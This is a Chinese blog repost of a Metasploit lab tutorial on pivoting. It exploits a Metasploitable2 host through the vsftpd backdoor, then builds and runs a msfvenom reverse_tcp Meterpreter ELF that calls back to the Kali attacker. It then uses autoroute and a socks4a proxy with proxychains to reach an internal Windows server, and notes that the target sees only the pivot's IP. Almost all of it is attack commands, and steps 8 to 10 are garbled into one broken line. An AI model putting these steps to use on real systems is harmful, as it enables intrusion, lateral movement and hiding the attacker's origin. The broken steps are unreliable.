渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器(meterpreter内网渗透)

网友投稿 328 2022-10-02


渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器(meterpreter内网渗透)

攻击机:Kali 192.168.75.10

跳板: Metasploitable2 192.168.75.130

目标机: Windows Server 2012 192.168.75.140

这里无法通过Kali(192.168.75.10)主机直接访问目标机(192.168.75.140),目标机只能通过跳板(192.168.75.130)访问,这里Kali(192.168.75.10)已经成功渗透跳板(192.168.75.130)主机,需要将已渗透主机(192.168.75.130)设置为跳板来访问目标机(192.168.75.140)。

如果直接通过攻击机(192.168.75.10)访问目标机(192.168.75.140),会出现如下错误:

这里,跳板(192.168.75.130)拥有连接目标机(192.168.75.140)权限。因此需要一些方法将我们对目标机(192.168.75.140)发起的请求通过跳板(192.168.75.130)转发出去,需要的这种技术方法就是跳板技术。

这里,我们首先要渗透跳板(192.168.75.130)主机。具体步骤如下:

1.开启MSF

msfconsole

2.扫描指定主机的服务和端口

nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130

如果要存入MSF的数据库,则:

db_nmap -sV -p 21,22,25,80,110,443,445 192.168.75.130

3.列出在目标端口上运行的服务

services

4.过滤服务,只显示开启的服务

services -u

5.列出数据库中所有的主机

hosts

6.漏洞攻击

use exploit/unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.75.130set RPORT 21show payloadsset payload cmd/unix/interactexploit

注:所有操作都是在MSF终端下

这里,我们继续将Shell控制升级为Meterpreter命令行。

在攻击机Kali上重新开启一个终端:

7.生成反弹木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.75.10 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

8.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中

service apache2 startmv backdoor.elf /var/exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcpset LHOST 192.168.75.10set LPORT 4444exploit

11.在目标机上运行木马文件

切换到第6步的终端,执行命令:

chmod 7777 backdoor.elf./backdoor.elf

12.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们需要执行autoroute脚本,并使用-s将脚本的参数设定为目标主机(192.168.75.140)的IP地址,这样我们就可以在已经被我们渗透的跳板机(192.168.75.130)上添加一条到达目标主机(192.168.75.140)的路由。

13.添加路由

run autoroute -prun autoroute -s 192.168.75.140run autoroute -p

以攻击者(192.168.75.10)的角度看,现在需要启动一个可以将请求通过Meterpreter发送给目标的模块。可以选择auxiliary/server/socks4a这个模块。

14.启动监听

在攻击机(192.168.75.10)上执行如下命令:

use auxiliary/server/socks4ashow optionsset SRVHOST 127.0.0.1set SRVPORT 1080run

15.配置攻击机(192.168.75.10)/etc/proxychains.conf

添加下面一行配置:

socks4 127.0.0.1 1080

16.配置Forefox代理

再一次打开目标服务器(192.168.75.140)的限制目录下的网页。

这里,我们就可以访问了。

接下来,我们访问下目标服务器(192.168.75.140)服务器的IP记录器,如下:

可以看到是跳板(192.168.75.130)的IP地址,不管我们对目标服务器(192.168.75.140)做了什么,对目标服务器(192.168.75.140)眼中这一切都是跳板机(192.168.75.130)做的。然而,我们的真实IP确是192.168.75.10。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:客户端渗透之——与DNS欺骗的结合使用(利用dns欺骗技术,可以进一步进行)
下一篇:SpringBoot是如何实现自动配置的你知道吗
相关文章

 发表评论

暂时没有评论,来抢沙发吧~